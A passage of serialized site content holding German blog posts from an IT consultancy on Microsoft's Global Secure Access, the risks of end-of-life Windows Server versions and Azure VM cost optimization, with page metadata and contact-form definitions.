auf Legacy-Systeme bleibt notwendig. Zudem besteht im Netzwerk Stack weiterhin Bedarf an fortgeschrittenen Sicherheitsmaßnahmen.",[353,10489,10490],{},"Die Integration von veralteten VPN-Lösungen in moderne Cloud-Umgebungen hat sich oft als problematisch erwiesen, insbesondere wenn es um die Verbindung mit Microsoft 365 geht. Mit Entra Private Access bieten wir nun eine echte identitätszentrierte Zero Trust Network Access-Lösung, die speziell für komplexe Rechenzentrumsumgebungen entwickelt wurde, und mit Entra Internet Access eine fortschrittliche Secure Web Gateway-Lösung mit Conditional Access Integration.",[2548,10492,10494],{"id":10493},"was-ist-global-secure-access","Was ist Global Secure Access?",[353,10496,9352],{},[353,10498,10499],{},"Global Secure Access zielt darauf ab, Sicherheitsdienste cloud-basiert bereitzustellen, um managed Devices über alle gängigen Plattformen hinweg zu unterstützen. Dies schließt die Integration in Identitätsanbieter und Sicherheitstools wie XDR-Systeme oder SIEM ein.",[353,10501,10502],{},[374,10503,10506],{"href":10504,"rel":10505},"https://res.cloudinary.com/c4a8/image/upload/v1721295305/blog/pics/gsa-architecture.png",[378],"GSA-Architektur",[353,10508,10509],{},"Die Architektur der SSE-Lösung ist dabei in zwei Hauptbereiche mit unterschiedlichen Komponenten unterteilt:",[367,10511,10512,10518],{},[370,10513,10514,10517],{},[433,10515,10516],{},"Internet Access"," beinhaltet ein identitätszentriertes Secure Web Gateway (SWG), das ähnlich wie ein Forward-Proxy funktioniert. Es bietet nicht nur Schutz vor Malware und anderen Bedrohungen, sondern führt auch eine URL-Kategorienfilterung durch.",[370,10519,10520,10523],{},[433,10521,10522],{},"Private Access"," ist eine identitätszentrierte Zero Trust Network Access (ZTNA) Lösung, die einen granularen und konsistenten Zugriff auf nicht-öffentliche Anwendungen unabhängig von deren Standort ermöglicht und eine detaillierte kontextbasierte Zugriffskontrolle implementiert.",[2548,10525,10527],{"id":10526},"was-ist-der-unterschied-zwischen-global-secure-access-und-meinem-vpn-gatewayproxy","Was ist der Unterschied zwischen Global Secure Access und meinem VPN-Gateway/Proxy?",[353,10529,9352],{},[353,10531,10532],{},"Sowohl Entra Internet Access als auch Entra Private Access bieten eine Conditional Access-Integration, die eine starke Authentifizierung und die Durchsetzung der Gerätekonformität auf der Authentifizierungsebene ermöglicht, einschließlich der Integration von Microsoft Defender for Endpoint. Microsoft arbeitet außerdem an zusätzlichen Durchsetzungsmechanismen auf Datenebene durch Continuous Access Evaluation, um fortgeschrittene Token-Diebstahlszenarien zu bekämpfen.",[353,10534,10535],{},"Selbst neuere VPN-Gateways decken in der Regel die anfängliche Benutzerauthentifizierung über RADIUS oder SAML ab und gewähren den Zugriff auf die Umgebung - oft für einen bestimmten Zeitraum - unabhängig davon, ob der Benutzer oder Client in einen Sicherheitsvorfall verwickelt ist. Dieser einmal authentifizierte Zugang gilt in der Regel für das gesamte interne Netzwerk, wobei für alle Benutzer die gleichen Regeln gelten.",[2179,10537,10538],{},[353,10539,10540,10543],{},[433,10541,10542],{},"Entra Private Access"," wurde entwickelt, um einzelne Netzwerksegmente zu Enterprise Apps zusammenzufassen und dann die Benutzer mit Conditional Access individuell zuzuweisen, zu authentifizieren und einzuschränken.",[353,10545,10546],{},[356,10547],{"alt":10548,"src":10549},"Full Tunnel vs. App-basierter Tunnel","https://res.cloudinary.com/c4a8/image/upload/v1721295307/blog/pics/tunnel-comparison.png",[353,10551,10552],{},"Meiner Erfahrung nach ist das Hauptproblem bei sicheren Web-Gateways die schlechte Integration mit Identity Providern. Während die ersten Versionen ADFS-Farmen mit umfangreichen SAML-Anfragen in die Knie zwangen und massive Störungen verursachten, sind die Anbieter mittlerweile zur einmaligen Authentifizierung übergegangen und arbeiten mit ihren eigenen langlebigen Cookies.",[353,10554,10555],{},"Das zweite große Problem ist der Ausschluss von Microsoft URLs und IPs aus dem Proxy-Regelsatz. Hier wird einfach kein Proxy zwischen dem Client und vertrauenswürdigen Diensten wie M365 benötigt, was in der Tat zu verschiedenen Problemen und Leistungseinbußen führt. Ich habe noch keinen Anbieter gesehen, bei dem das unfallfrei funktioniert.",[353,10557,10558,10561],{},[433,10559,10560],{},"Entra Internet Access"," ist Teil der meisten Cloud-Identitätsanbieter für Unternehmen und verfügt über eine sehr starke Conditional Access-Integration.",[2179,10563],{},[2548,10565,10567],{"id":10566},"möchtet-ihr-mehr-über-die-lösung-erfahren","Möchtet ihr mehr über die Lösung erfahren?",[353,10569,9352],{},[353,10571,10572],{},"Wir verfügen über umfassende Erfahrung in den Bereichen Identity, Security, Workplace und Network. Mit Global Secure Access bringen wir all diese Aspekte zusammen. Verabschiedet euch von veralteten VPN- und Webproxy-Lösungen und schöpft die Möglichkeiten von Microsofts SSE-Lösung voll aus. Wir freuen uns auf eure Kontaktaufnahme!",{"title":402,"searchDepth":403,"depth":403,"links":10574},[10575,10576,10577],{"id":10493,"depth":403,"text":10494},{"id":10526,"depth":403,"text":10527},{"id":10566,"depth":403,"text":10567},"glueckkanja freut sich bekannt zu geben, dass wir als einer der Product Launch Partners für Microsofts neueste Security Service Edge (SSE) Lösung, Global Secure Access, ausgewählt wurden. Diese Lösung umfasst Microsoft Entra Internet & Private Access und setzt neue Maßstäbe in der Cloud-Sicherheit.",{"seoTitle":10580,"titleClass":7896,"date":10581,"categories":10582,"blogtitlepic":10583,"socialimg":10584,"customExcerpt":10585,"keywords":10586,"contactInContent":10587,"hreflang":10608,"scripts":10613},"glueckkanja ist Product Launch Partner für Microsofts Security Service Edge (SSE)-Lösung","2024-07-18",[1117],"head-global-secure-access","/blog/heads/head-global-secure-access.jpg","Wir freuen uns, unsere Rolle als „Product Launch Partner“ für Microsofts Security Service Edge (SSE)-Lösung Global Secure Access bekanntzugeben, die Microsoft Entra Internet & Private Access einschließt. Durch unsere enge Zusammenarbeit mit Microsoft in mehreren Private Previews konnten wir dazu beitragen, diese Funktionen so zu optimieren, dass sie nicht nur für uns, sondern auch für unsere Kunden von Vorteil sind. Ihre Anforderungen sind in ein nahtloses und sicheres Cloud-Erlebnis eingeflossen. Entdeckt, wie unsere Expertise in einem vollständig cloudbasierten Ansatz und Zero Trust Design den modernen Arbeitsplatz und die identitätszentrierte Sicherheit transformiert.","Global Secure Access, SSE, Microsofts SSE, Private Access, Internet Access, VPN replacement, Zero Trust Network Access, Network security",{"quote":406,"infos":10588},{"bgColor":10589,"color":10128,"boxBgColor":10590,"boxColor":10126,"headline":10591,"subline":10592,"level":2548,"textStyling":9489,"flush":9490,"person":10593,"form":10597},"var(--color-gigas)","var(--color-yellow)","Get in touch now","Möchtest ihr mehr über Microsofts SSE-Lösung erfahren? Gerne stellen wir euch unseren Ansatz persönlich vor und unterstützen euch mit unserer Erfahrung bei der Implementierung. Wir freuen uns darauf, von euch zu hören!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":10135,"details":10594},[10595,10596],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":10598,"method":407,"action":9511,"fields":10599},{"skin":9510},[10600,10601,10602,10603,10604,10606,10607],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":10149,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":10605},"Anfrage Global Secure Access",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[10609,10611],{"lang":2118,"href":10610},"/blog/security/2024/07/gsa-launch-partner-en",{"lang":9114,"href":10612},"/blog/security/2024/07/gsa-launch-partner-es",{"slick":415,"form":415},"/posts/2024-07-18-gsa-launch-partner",{"title":10464,"description":10578},"posts/2024-07-18-gsa-launch-partner",[10483,10618,10619,1117],"Zero Trust","VPN Replacement","o7wCSQlUEKsaCjvrOHxzdnMC6hSx8oOBC1x49H5Woe8",{"id":10622,"title":10623,"author":10624,"body":10625,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10917,"moment":10918,"navigation":415,"path":10954,"seo":10955,"stem":10956,"tags":10957,"webcast":406,"__hash__":10962},"content_de/posts/2024-10-17-end-of-support-operating-systems-de.md","Warum veraltete Windows Server Ihr Unternehmen gefährden",[245],{"type":350,"value":10626,"toc":10905},[10627,10631,10633,10636,10639,10643,10645,10651,10657,10660,10668,10672,10674,10677,10689,10692,10695,10698,10701,10705,10707,10711,10714,10717,10726,10732,10736,10738,10741,10744,10755,10761,10767,10773,10777,10779,10784,10787,10793,10801,10805,10807,10810,10813,10816,10819,10822,10826,10828,10831,10835,10884,10890,10893,10896,10899],[2548,10628,10630],{"id":10629},"windows-server-vs-flugzeug","Windows Server vs Flugzeug",[353,10632,9352],{},[353,10634,10635],{},"Stellen Sie sich vor, Sie steigen in ein Flugzeug, das längst aus dem Verkehr gezogen wurde und über 35 kritische technische Mängel aufweist. Würden Sie sich sicher fühlen? Überlegen Sie nun, wie es bei Ihrem Windows Server 2012 R2 aussieht. Dieser ist im Grunde wie dieses veraltete Flugzeug – voller Schwachstellen, aber diesmal steht die Infrastruktur Ihres Unternehmens auf dem Spiel.",[353,10637,10638],{},"Es ist an der Zeit zu handeln – verlieren Sie keine Zeit. Ihr Flug ist gebucht, aber er ist ernsthaft gefährdet.",[2548,10640,10642],{"id":10641},"verstehen-sie-die-sicherheitsimplikationen-und-potenziellen-auswirkungen","Verstehen Sie die Sicherheitsimplikationen und potenziellen Auswirkungen",[353,10644,9352],{},[353,10646,10647,10650],{},[433,10648,10649],{},"Auswirkung auf den Security Score:"," End-of-Life (EOL) Systeme senken den Security Score Ihres Unternehmens erheblich.",[353,10652,10653,10656],{},[433,10654,10655],{},"Massives Risiko:"," Diese Systeme sind aufgrund fehlender Updates und Herstellerunterstützung äußerst anfällig für Angriffe und stellen eine schwere Bedrohung für das gesamte Unternehmensnetzwerk dar.",[353,10658,10659],{},"Angreifer lieben EOL-Betriebssysteme, da sie offene Einladungen sind, um in Ihr Netzwerk einzudringen, was zu einer vollständigen Kompromittierung der Infrastruktur führen kann.",[353,10661,10662,10663,10667],{},"Während unsere ",[374,10664,10666],{"href":10665},"/de/security/wurden-sie-angegriffen/","APT Response Services"," Ihnen bei der Wiederherstellung helfen können, empfehlen wir stets einen proaktiven Ansatz – damit es gar nicht erst so weit kommt.",[2548,10669,10671],{"id":10670},"eol-systeme-in-ihrem-unternehmen-identifizieren","EOL-Systeme in Ihrem Unternehmen identifizieren",[353,10673,9352],{},[353,10675,10676],{},"Erkennen & Methoden zur Identifizierung von End-of-Life (EOL) Betriebssystemen",[353,10678,10679,10680,10684,10685,10688],{},"Beginnen Sie mit der Erkennung. Während unserer Assessments entdecken wir regelmäßig End-of-Life (EOL) Systeme, sei es durch ",[374,10681,10683],{"href":10682},"/de/security/praeventive-dienste/","Preventive Services wie AD/EID"," oder unsere ",[374,10686,10687],{"href":10016},"Managed CSOC Angebote",". Der erste Schritt zur Behebung dieses Problems besteht darin, zuverlässige Methoden zur Identifizierung von EOL-Systemen zu entwickeln und Maßnahmen zu ergreifen.",[353,10690,10691],{},"Es ist entscheidend, eine Strategie zur regelmäßigen Identifizierung dieser veralteten Systeme mit verschiedenen Tools und Assessments zu etablieren. Wir können Ihnen dabei helfen, diese effektiv umzusetzen.",[353,10693,10694],{},"Ein wichtiger Schritt ist die Identifizierung Ihrer geschäftskritischen Anwendungen (Line-of-Business, LOB) und die Überprüfung, auf welchen Systemen sie betrieben werden, um sicherzustellen, dass sie den Anforderungen Ihres Unternehmens entsprechen. Dabei hilft das risikobasierte LOB-Dreieck, Abhängigkeiten aufzudecken und Risiken unternehmensweit zu bewerten.",[353,10696,10697],{},"Durch die Analyse von Risikomustern und Schwankungen im Zeitverlauf wird dieser Ansatz zu einem zentralen Bestandteil des effektiven Risikomanagements und liefert Ihrem Management wertvolle Erkenntnisse. Dies ist besonders wichtig, wenn sensible geschäftskritische Anwendungen (LOBs), die an der Spitze des Risikodreiecks stehen, auf veralteten Systemen (EOL) laufen. Solche Systeme gefährden die Servicekontinuität, die operative Stabilität und die Gesamtleistung des Unternehmens erheblich.",[353,10699,10700],{},"Kurz gesagt: Wenn Ihre kritischsten LOBs auf EOL-Systemen laufen, setzen Sie Ihr Unternehmen einem hohen Risiko von Serviceunterbrechungen und erhöhten operativen Gefahren aus.",[2548,10702,10704],{"id":10703},"strategie-für-den-umgang-mit-veralteten-betriebssystemen-entwickeln","Strategie für den Umgang mit veralteten Betriebssystemen entwickeln",[353,10706,9352],{},[629,10708,10710],{"id":10709},"kurzfristige-lösung-esu-könnte-ihre-rettung-sein","Kurzfristige Lösung: ESU könnte Ihre Rettung sein",[353,10712,10713],{},"{: .h4-font-size}",[353,10715,10716],{},"Sichern Sie sich durch eine kurzfristige Lösung ab, während Sie gleichzeitig eine langfristige Strategie entwickeln, um End-of-Life (EOL) und End-of-Support (EOS) Systeme zu bewältigen.",[353,10718,10719,10720,10725],{},"Nutzen Sie ",[374,10721,10724],{"href":10722,"rel":10723},"https://www.microsoft.com/de-de/windows-server/extended-security-updates",[378],"Extended Security Updates (ESU)"," als Notlösung, um durch diese schwierige Zeit zu kommen. ESU kann EOL-Systeme vorübergehend absichern, bis die Migration oder Stilllegung abgeschlossen ist. Denken Sie daran, dass dies nur eine kurzfristige Lösung ist.",[353,10727,10728,10731],{},[433,10729,10730],{},"Isolation:"," Isolieren Sie diese Systeme während der Übergangszeit vollständig von Netzwerken und Active Directory. Dies gibt Ihnen die Zeit, Ihre Migration zu planen und durchzuführen, ohne sich schwerwiegenden Risiken auszusetzen.",[629,10733,10735],{"id":10734},"entwickeln-sie-eine-langfristige-strategie","Entwickeln Sie eine langfristige Strategie",[353,10737,10713],{},[353,10739,10740],{},"Nachdem die unmittelbaren Herausforderungen mit ESU bewältigt wurden, ist es Zeit, den Fokus auf eine langfristige Strategie zu legen, um Altsysteme schrittweise abzuschaffen. Nehmen Sie sich die Zeit, die besten langfristigen Lösungen zu bewerten, die zu Ihren Anforderungen passen.",[353,10742,10743],{},"Erwägen Sie die Migration zu modernen Betriebssystemen, serverlosen Ansätzen, Software-as-a-Service (SaaS) oder cloud-nativen Lösungen, die auf Ihre Umgebung zugeschnitten sind.",[353,10745,10746,10749,10750,10754],{},[433,10747,10748],{},"Migration:"," Planen und führen Sie das Upgrade veralteter Systeme auf die neuesten Versionen durch. Bewerten Sie Alternativen wie serverlose Ansätze, Container oder Kubernetes (K8s). glueckkanjas ",[374,10751,10753],{"href":10752},"/de/azure/migrate-to-the-cloud","Azure Foundation Blueprint"," bietet eine solide Grundlage für Ihre Cloud-Migration. Durch den Einsatz von Infrastructure-as-Code gewährleisten wir eine schnelle Implementierung mit höchster Qualität. Sicherheits- und Governance-Anforderungen sind direkt in die Plattform eingebettet, und integrierte Kontrollen wie Richtlinien und Automatisierung ersetzen veraltete, kostspielige Prozesse und Workflows.",[353,10756,10757,10760],{},[433,10758,10759],{},"Stilllegung:"," Sichere Stilllegung nicht mehr unterstützter Systeme.\nMit diesem Ansatz mindern Sie unmittelbare Risiken, während Sie gleichzeitig langfristige Sicherheitsverbesserungen planen. Wenn Sie weitere Details oder Unterstützung benötigen, kontaktieren Sie uns gerne!",[353,10762,10763,10766],{},[433,10764,10765],{},"Langfristiges Ziel:"," Stellen Sie sicher, dass Sie in Zukunft gut im Voraus vorbereitet sind, bevor Ihre Systeme das Ende ihrer Lebensdauer (EOL) erreichen.",[353,10768,10769,10772],{},[433,10770,10771],{},"Kontakt zu unseren Azure-Experten:"," Planen und realisieren Sie Ihre erfolgreiche Cloud-Migration mit unserer Unterstützung. glueckkanja verfügt über die Azure Advanced Specialization for Infrastructure and Database Migration. Zudem haben unsere Kunden die Möglichkeit, vom Azure Migration and Modernization Program (AMM) zu profitieren, das umfassende Unterstützung bei der Migration bietet.",[2548,10774,10776],{"id":10775},"kennen-sie-den-os-support-lebenszyklus","Kennen Sie den OS-Support-Lebenszyklus",[353,10778,9352],{},[353,10780,10781],{},[433,10782,10783],{},"Überprüfen Sie regelmäßig den Support-Lebenszyklus und den Zeitrahmen jedes Betriebssystems (OS), um die Einhaltung der Vorschriften und das proaktive Risikomanagement sicherzustellen.",[353,10785,10786],{},"Microsoft bietet konsistente und vorhersehbare Richtlinien für ihre Produkte, sei es für Server-Betriebssysteme, Client-Betriebssysteme oder andere Produkte wie Exchange, SQL und viele mehr.",[353,10788,10789,10790,456],{},"Dies ermöglicht eine strategische Planung für die Zukunft. Bleiben Sie immer informiert über den Lebenszyklus von Betriebssystemen und Software. Regelmäßige Überprüfungen helfen Ihnen, die Einhaltung der Vorschriften sicherzustellen und Risiken proaktiv zu managen. Mit Defender for Endpoint werden diese Überprüfungen vereinfacht. Die Überwachung von Schwachstellen und die Identifizierung von End-of-Life-Systemen sind wesentliche Bestandteile unseres ",[374,10791,10792],{"href":8529},"CSOC Service",[353,10794,10795,10796,456],{},"Verschaffen Sie sich einen Überblick über die ",[374,10797,10800],{"href":10798,"rel":10799},"https://learn.microsoft.com/en-us/lifecycle/",[378],"Microsoft Lifecycle Policy",[2548,10802,10804],{"id":10803},"fazit-warten-sie-nicht-bis-die-presse-ihre-geschichte-schreibt","Fazit: Warten Sie nicht, bis die Presse Ihre Geschichte schreibt",[353,10806,9352],{},[353,10808,10809],{},"Die Botschaft ist eindeutig: Warten Sie nicht, bis es zu Ausfällen oder Sicherheitsvorfällen kommt.",[353,10811,10812],{},"Wir hoffen, nur positive Nachrichten über Ihr Unternehmen in der Presse zu lesen. Obwohl wir APT Response Services anbieten, empfehlen wir Ihnen - und allen unseren Kunden - dringend, proaktiv mit uns zusammenzuarbeiten, anstatt auf eine Sicherheitsverletzung zu reagieren.",[353,10814,10815],{},"Der Kern dieses Artikels ist es, Sie dazu zu ermutigen, von einer reaktiven Haltung zu einer proaktiven Vorbereitung Ihres Unternehmens auf die nächste Ebene überzugehen. Machen Sie Ihr Unternehmen zukunftssicher, indem Sie bestehende Plattformen aktuell halten oder cloud-native Lösungen einführen. Alle Beteiligten, von Ihren Kunden bis zum Management, werden diesen vorausschauenden Ansatz zu schätzen wissen.",[353,10817,10818],{},"Insbesondere das Management sollte sich seiner Verantwortung und Haftung bewusst sein, um die betriebliche Stabilität und Sicherheit des Unternehmens zu gewährleisten.",[353,10820,10821],{},"Nutzen Sie unsere Azure-, Workplace- und Security-Angebote – wir freuen uns auf Ihre Kontaktaufnahme!",[2548,10823,10825],{"id":10824},"anhang-windows-server-2012-r2-windows-server-2008-r2-anzahl-der-sicherheitslücken","Anhang - Windows Server 2012 R2 - Windows Server 2008 R2 - Anzahl der Sicherheitslücken",[353,10827,9352],{},[353,10829,10830],{},"Die folgende Tabelle zeigt die bekannten Sicherheitslücken, die monatlich um mehr als 20 ansteigen.",[10832,10833,10834],"style",{},"\ntable {\n  font-family: arial, sans-serif;\n  border-collapse: collapse;\n  width: 100%;\n}\n\ntd, th {\n  border: 1px solid #dddddd;\n  text-align: left;\n  padding: 8px;\n}\n\ntr:nth-child(even) {\n  background-color: #dddddd;\n}\n",[8921,10836,8923,10837],{},[8925,10838,10839,8923,10850,8923,10862,8923,10874],{},[8928,10840,2557,10841,2557,10844,2557,10847,8923],{},[8932,10842,10843],{},"Operating System",[8932,10845,10846],{},"Windows Server 2012 R2",[8932,10848,10849],{},"Windows Server 2008 R2",[8928,10851,2557,10852,2557,10855,2557,10859,8923],{},[8948,10853,10854],{},"Total # of Vulnerabilities*",[8948,10856,10858],{"style":10857},"text-align: center;","1.142",[8948,10860,10861],{"style":10857},"2.240",[8928,10863,2557,10864,2557,10867,2557,10871,8923],{},[8948,10865,10866],{},"Critical",[8948,10868,10870],{"style":10869},"text-align: center; color: red;","35",[8948,10872,10873],{"style":10869},"47",[8928,10875,2557,10876,2557,10878,2557,10881,8923],{},[8948,10877,8971],{},[8948,10879,10880],{"style":10857},"806",[8948,10882,10883],{"style":10857},"1.457",[353,10885,10886],{},[10887,10888,10889],"small",{},"Datenstand: September 2024, mit einer wachsenden Anzahl von Sicherheitslücken von Monat zu Monat",[353,10891,10892],{},"Stand September 2024 weist Windows Server 2012 R2 insgesamt 1.142 Sicherheitslücken auf (siehe Punkt 1), die nicht behoben oder gepatcht wurden. Diese Zahl wächst stetig von Monat zu Monat, wobei 35 als kritisch und 806 als hoch eingestuft werden (siehe Punkt 2).",[353,10894,10895],{},"Die Lage ist bei Windows Server 2008 R2 noch bedenklicher, da dort noch mehr bekannte Sicherheitslücken existieren. Dies stellt eine verlockende Einladung für Angreifer dar, die wissen, wo sie ansetzen können, um ein System zu kompromittieren.",[353,10897,10898],{},"Diese Daten stammen aus Microsoft Defender for Endpoint, das einen umfassenden Überblick bietet und wertvolle Einblicke in Systemschwachstellen ermöglicht.",[353,10900,10901],{},[356,10902],{"alt":10903,"src":10904},"Microsoft Defender for Endpoint Vulnerabilities","https://res.cloudinary.com/c4a8/image/upload/v1729419170/blog/pics/defender-portal-vulnerabilites.png",{"title":402,"searchDepth":403,"depth":403,"links":10906},[10907,10908,10909,10910,10914,10915,10916],{"id":10629,"depth":403,"text":10630},{"id":10641,"depth":403,"text":10642},{"id":10670,"depth":403,"text":10671},{"id":10703,"depth":403,"text":10704,"children":10911},[10912,10913],{"id":10709,"depth":704,"text":10710},{"id":10734,"depth":704,"text":10735},{"id":10775,"depth":403,"text":10776},{"id":10803,"depth":403,"text":10804},{"id":10824,"depth":403,"text":10825},{"seoTitle":10623,"titleClass":7896,"date":10918,"categories":10919,"blogtitlepic":10920,"socialimg":10921,"customExcerpt":10922,"keywords":10923,"contactInContent":10924,"hreflang":10948,"scripts":10953},"2024-10-17",[1117],"head-end-of-support","/blog/heads/head-end-of-support.jpg","Würden Sie einem Flugzeug mit kritischen Mängeln vertrauen, um sicher ans Ziel zu kommen? Warum also Ihrem Windows Server 2012 R2, wenn es um die Sicherheit Ihres Unternehmens geht? Mit über 35 kritischen Schwachstellen könnten veraltete Systeme das größte Risiko für Ihre Organisation darstellen. Erfahren Sie, wie Sie Ihre Infrastruktur schützen, bevor es zu spät ist – denn in der heutigen Bedrohungslage gibt es keinen Spielraum für Fehler.","Global Secure Access, SSE, Microsofts SSE, Private Access, Internet Access, VPN-Ersatz, Zero Trust Network Access, Netzwerksicherheit",{"quote":406,"infos":10925},{"bgColor":10589,"color":10128,"boxBgColor":10590,"boxColor":10126,"headline":10059,"subline":10926,"level":2548,"textStyling":9489,"flush":9490,"person":10927,"form":10933},"Möchten Sie mehr über End-of-Life (EOL) und End-of-Support (EOS) Systeme erfahren? Kontaktieren Sie uns gerne! Wir freuen uns auf Ihre Nachricht!",{"image":10204,"cloudinary":415,"alt":10928,"name":10928,"detailsHeader":10929,"details":10930},"Projekt- und Account-Management","Wir freuen uns auf Ihre Nachricht!",[10931,10932],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":10934,"method":407,"action":9511,"fields":10935},{"skin":9510},[10936,10938,10940,10942,10944,10946,10947],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10937},"Bitte geben Sie Ihren Namen ein.",{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10939},"Bitte geben Sie Ihr Unternehmen ein.",{"label":10941,"type":9523,"id":9523,"required":415,"requiredMsg":9524},"E-Mail-Adresse*",{"label":10943,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Ihre Daten werden von uns zum Zweck der Bearbeitung und Beantwortung Ihrer Anfrage gespeichert. Weitere Informationen zum Datenschutz finden Sie in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":9531,"id":9532,"value":10945},"Anfrage EOS EOL Systems",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[10949,10951],{"lang":2118,"href":10950},"/blog/security/2024/10/end-of-support-operating-systems-en",{"lang":9114,"href":10952},"/blog/security/2024/10/end-of-support-operating-systems-es",{"slick":415,"form":415},"/posts/2024-10-17-end-of-support-operating-systems-de",{"title":10623,"description":402},"posts/2024-10-17-end-of-support-operating-systems-de",[7357,10958,10959,10960,10961],"Windows Server","Security Risk","Vulnerability Management","Security Score","2Jk87eQPpaUVwDnXVU5QEZTi0xD3_lHt5CNNqY_Qiwk",{"id":10964,"title":10965,"author":10966,"body":10967,"cta":3,"description":10973,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":11226,"moment":11228,"navigation":415,"path":11240,"seo":11241,"stem":11242,"tags":11243,"webcast":406,"__hash__":11246},"content_de/posts/2024-11-11-vm-cost-optimization-on-azure.md","Wie man die Kosten seiner Azure-VMs im Griff behält",[240],{"type":350,"value":10968,"toc":11216},[10969,10974,10977,10981,10983,10986,10989,11003,11006,11010,11012,11015,11026,11029,11032,11039,11048,11052,11054,11057,11061,11063,11066,11069,11075,11081,11087,11092,11101,11107,11111,11113,11116,11122,11127,11133,11144,11150,11167,11171,11173,11176,11188,11194,11197,11200,11205,11208,11210,11213],[353,10970,10971],{},[433,10972,10973],{},"\"Warum kosten meine virtuellen Maschinen (VMs) in Azure so viel? Ich dachte, in der Cloud wird alles günstiger!\"",[353,10975,10976],{},"Solche Aussagen hören wir häufig von Kunden – insbesondere von denen, die ihre IT-Infrastruktur per \"Lift & Shift\" ohne Anpassungen in die Cloud verlagert haben. Ohne entsprechende Optimierungen kann die Cloud tatsächlich teurer werden, als man denkt.",[2548,10978,10980],{"id":10979},"braucht-man-überhaupt-eine-vm","Braucht man überhaupt eine VM?",[353,10982,9352],{},[353,10984,10985],{},"Das ist die erste Frage, die man sich stellen sollte: Wird für die Aufgabe wirklich eine VM benötigt oder könnte ein Cloud-nativer Service wie Azure Functions oder ein Kubernetes-Cluster die bessere Alternative sein?",[353,10987,10988],{},"Es gibt jedoch auch gute Gründe, warum man an einer VM festhalten sollte:",[367,10990,10991,10994,10997,11000],{},[370,10992,10993],{},"Anforderungen von Softwareherstellern",[370,10995,10996],{},"Fehlendes Know-how im Unternehmen zur Umstellung der Anwendung",[370,10998,10999],{},"Personalmangel",[370,11001,11002],{},"Weitere spezifische Anforderungen",[353,11004,11005],{},"Wie kann man also Kosten optimieren, wenn eine VM unvermeidbar ist?\nHier sind einige effektive Ansätze.",[2548,11007,11009],{"id":11008},"die-größten-kostentreiber-bei-vms","Die größten Kostentreiber bei VMs",[353,11011,9352],{},[353,11013,11014],{},"Die Kosten für VMs in Azure werden maßgeblich durch folgende Faktoren beeinflusst:",[367,11016,11017,11020,11023],{},[370,11018,11019],{},"Laufzeit",[370,11021,11022],{},"Die zugeordnete SKU (Virtual Machine Size)",[370,11024,11025],{},"Betriebssystemlizenzen",[353,11027,11028],{},"Die Kosten setzen sich primär aus den genutzten Ressourcen während der Laufzeit zusammen. Solange eine VM aktiv ist und CPU- und RAM-Ressourcen beansprucht, fallen Kosten an – unabhängig davon, ob sie ausgelastet ist oder im Leerlauf arbeitet. Ist die VM ausgeschaltet, reduzieren sich die Kosten auf die Beträge für den genutzten Storage.",[353,11030,11031],{},"Jede VM in Azure ist einer spezifischen SKU zugeordnet, die die Ausstattung hinsichtlich CPU und RAM beschreibt. Verschiedene SKUs sind auf unterschiedliche Anwendungsszenarien optimiert, z. B. ein hohes Verhältnis von CPU-Kernen zu RAM für rechenintensive Aufgaben.",[353,11033,11034,11035,11038],{},"Die Bezeichnung einer SKU gibt in der Regel Auskunft über die Konfiguration.\n",[433,11036,11037],{},"Ein Beispiel:"," Eine VM aus der D-Serie ist auf ein ausgeglichenes Verhältnis zwischen CPU und RAM ausgerichtet, wobei die typische Ratio bei 4 GB RAM pro CPU-Kern liegt. Standard_D4s_v5 steht etwa für 4 CPU-Kerne und 16 GB RAM. Der Zusatz „s“ signalisiert, dass diese SKU den Zugriff auf Premium-SSD-Speicher ermöglicht.",[353,11040,11041,11042,11047],{},"Microsoft stellt eine ",[374,11043,11046],{"href":11044,"rel":11045},"https://learn.microsoft.com/en-us/azure/virtual-machines/sizes/overview?tabs=breakdownseries%2Cgeneralsizelist%2Ccomputesizelist%2Cmemorysizelist%2Cstoragesizelist%2Cgpusizelist%2Cfpgasizelist%2Chpcsizelist",[378],"umfassende Übersicht"," über alle verfügbaren SKUs inklusive detaillierter Leistungsdaten bereit.",[2548,11049,11051],{"id":11050},"wie-sich-die-kosten-bei-vms-optimieren-lassen","Wie sich die Kosten bei VMs optimieren lassen",[353,11053,9352],{},[353,11055,11056],{},"Zur Reduzierung der VM-Kosten sollten die folgenden Aspekte genau analysiert werden:",[629,11058,11060],{"id":11059},"ressourcenzuordnung","Ressourcenzuordnung",[353,11062,10713],{},[353,11064,11065],{},"Ein erster wichtiger Schritt ist die Frage: Ist die aktuelle VM der optimalen SKU zugeordnet?",[353,11067,11068],{},"Zur Beantwortung dieser Frage lohnt sich ein Blick auf die Metriken der VM im Azure-Portal. Dabei kann sich herausstellen, dass die gewählte VM-Größe überdimensioniert ist oder die Ressourcen nur zu bestimmten Zeiten voll genutzt werden, während sie den Rest des Monats im Leerlauf sind. Möglicherweise ist die VM auch einer falschen SKU-Serie zugeordnet, und eine Variante mit mehr RAM pro CPU-Kern wäre geeigneter.",[353,11070,11071,11074],{},[433,11072,11073],{},"Beispiel \"Intervallnutzung\":","\nEin typisches Szenario: monatliche Abrechnungsläufe im ERP-System. Die VM wird einmal pro Monat stark ausgelastet, um Aufträge abzurechnen, steht aber die restliche Zeit nur für sporadische, weniger intensive Datenabfragen bereit.",[353,11076,11077,11080],{},[433,11078,11079],{},"Lösung:"," Eine Anpassung der VM-Größe über den größten Teil des Monats auf eine kleinere SKU und das temporäre Hochskalieren zu den Abrechnungsläufen. Azure bietet hier die Möglichkeit, mit minimaler Downtime flexibel 